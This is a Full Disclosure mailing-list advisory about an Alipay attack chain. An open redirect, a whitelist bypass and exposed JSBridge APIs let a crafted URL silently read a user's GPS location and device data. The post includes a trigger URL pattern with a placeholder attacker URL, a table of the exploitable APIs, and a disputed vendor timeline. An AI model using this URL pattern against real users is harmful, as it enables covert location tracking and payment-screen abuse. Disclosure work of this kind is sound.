Full Disclosure mailing list archives

Alipay DeepLink+JSBridge Attack Chain: Silent GPS Exfiltration, 17 Vulns, 6 CVEs (CVSS 9.3)


From: Feng Ning via Fulldisclosure <fulldisclosure () seclists org>
Date: Thu, 12 Mar 2026 02:33:20 +0000

# Alipay DeepLink + JSBridge Attack Chain
# Silent GPS Exfiltration via Crafted URL

## Overview

Researcher: Jiqiang Feng / Innora AI Security Research
Vendor: Ant Group (蚂蚁集团) / Alibaba Group
Product: Alipay (支付宝) v10.x (Android & iOS)
Users Affected: 1 billion+
CVEs: 6 submitted to MITRE CNA-LR (2026-03-12)
CVSS: 7.4–9.3
Vendor Response: "Normal functionality"
Disclosure: Responsible (Feb 25 → Mar 11 public)

## Vulnerability Chain

A single crafted URL triggers the following attack chain:

1. Open Redirect (CWE-601): ds.alipay.com/?scheme= accepts arbitrary URL parameters, redirecting to the Alipay app via deep link
2. Whitelist Bypass (CWE-939): ds.alipay.com is a whitelisted Alipay domain, so the deep link handler trusts the redirect target
3. WebView Loading: Attacker-controlled page loads in Alipay's privileged WebView with JSBridge access
4. API Abuse: AlipayJSBridge.call() exposes sensitive native APIs without user consent

## Exploitable APIs (Verified)

| # | API | Data Extracted | Android | iOS |
|---|-----|---------------|---------|-----|
| 1 | getLocation | GPS coords (8.8m accuracy) | ✓ | ✓ |
| 2 | getNetworkType | WiFi/cellular, carrier info | ✓ | ✓ |
| 3 | getSystemInfo | Device model, OS, screen | ✓ | ✓ |
| 4 | getCameraPermission | Camera auth status | ✓ | ✓ |
| 5 | getMicrophonePermission | Mic auth status | ✓ | ✓ |
| 6 | tradePay | Pre-fill payment screen | ✗ | ✓ |
| 7 | share | Trigger share dialog | ✗ | ✓ |
| 8 | scan | Activate QR scanner | ✗ | ✓ |
| 9 | chooseImage | Access photo picker | ✗ | ✓ |

iOS attack surface is significantly larger than Android.

## PoC

Trigger URL pattern:
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=[BASE64_ENCODED_ATTACKER_URL]

Verification page (read-only, no data collection):
https://innora.ai/zfb/poc/trigger.html

## Verification

- 3 devices: Samsung S25 Ultra (NZ), Xiaomi Redmi 12 (MY), iPhone 16 Pro (CN-Hangzhou)
- 308 server-side exfiltration logs
- 42 screenshots
- Vendor's own security lead tested on iPhone from Hangzhou (Alipay HQ) — GPS captured silently in 7 seconds, accuracy 8.8m

## Timeline

2026-02-25: Initial TLS/SSL report to vendor
2026-03-06: Vendor: "cannot be practically exploited"
2026-03-07: Expanded report (17 vulns, full E2E proof)
2026-03-07: Whitelist bypass achieved in 2 min during live call with vendor
2026-03-08: Vendor's security lead's iPhone tested from Hangzhou — GPS captured
2026-03-10: Vendor final: "normal functionality"
2026-03-11: Public disclosure
2026-03-11: Vendor's law firm files takedown complaint (4 hours later)
2026-03-12: 6 CVEs submitted to MITRE

## Full Report

https://innora.ai/zfb/ (bilingual EN/ZH)

## Notes

- Alibaba is a registered CNA (CNA-2017-0006) but refused to assign CVEs
- Vendor's law firm complaint targets an article that never once mentions "Alipay" or "Ant Group" by name
- Vendor's security contact privately called it a "洞" (hole/vuln) while officially classifying it as "normal functionality"

## Contact

Jiqiang Feng | feng () innora ai | Innora AI Security Research
